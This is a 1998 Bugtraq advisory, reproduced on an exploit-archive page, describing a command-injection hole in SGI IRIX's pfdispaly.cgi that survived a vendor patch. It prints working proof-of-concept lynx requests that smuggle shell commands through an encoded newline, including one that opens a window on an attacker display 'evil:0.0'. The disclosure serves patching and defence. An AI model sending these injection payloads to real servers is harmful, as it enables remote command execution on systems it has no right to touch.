|
|
| Summary |
|---|
| Description: | As has been demonstrated many times, SGI CANNOT write secure CGI scripts. Nor can they write secure setuid programs. They fixed the last pfdisplay.cgi hole, but the new version is still quite buggy -- as this post demonstrates. |
| Author: | "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES> |
| Compromise: | run arbitrary commands remotely as the UID running the webserver |
| Vulnerable Systems: | SGI IRIX 6.2 using the performer_tools CGIs. |
| Date: | 7 April 1998 |
| Notes: | I honestly believe default SGI security is as bad as default Windows NT security. That is sad. |
| Details |
|---|
Date: Tue, 7 Apr 1998 03:16:01 +0200
From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
To: BUGTRAQ@NETSPACE.ORG
Subject: perfomer_tools again
Hi
There is already a patch from SGI to the pfdispaly.cgi
'../..' bug.
But it seems it fixes only that problem, without checking
the rest of the code for similar vulnerabilities, so even
after patch 3018 (04/01/98) you can try:
$ lynx -dump http://victim/cgi-bin/pfdispaly.cgi?'%0A/bin/uname%20-a|'
uname -a\| file
IRIX victim 6.2 03131015 IP22
or
$ lynx -dump \
http://victim/cgi-bin/pfdispaly.cgi?'%0A/usr/bin/X11/xclock%20-display%20evil:0.0|'
(You probably will notice this exploit is similar to that
one on 'wrap'; it's nice to find that sometimes reusing
code does work)
The fix is easy (for this particular problem); so it's left
to the reader.
Anyway, if you're using SGI cgi's you should consider
limiting the access to your domain...
--
J.A. Gutierrez So be easy and free
when you're drinking with me
I'm a man you don't meet every day
finger me for PGP (the pogues)
| More Exploits! |
|---|
| All OS's | Linux | Solaris/SunOS | Micro$oft |
| *BSD | Macintosh | AIX | IRIX |
| ULTRIX/Digital UNIX | HP/UX | SCO | Remote exploits |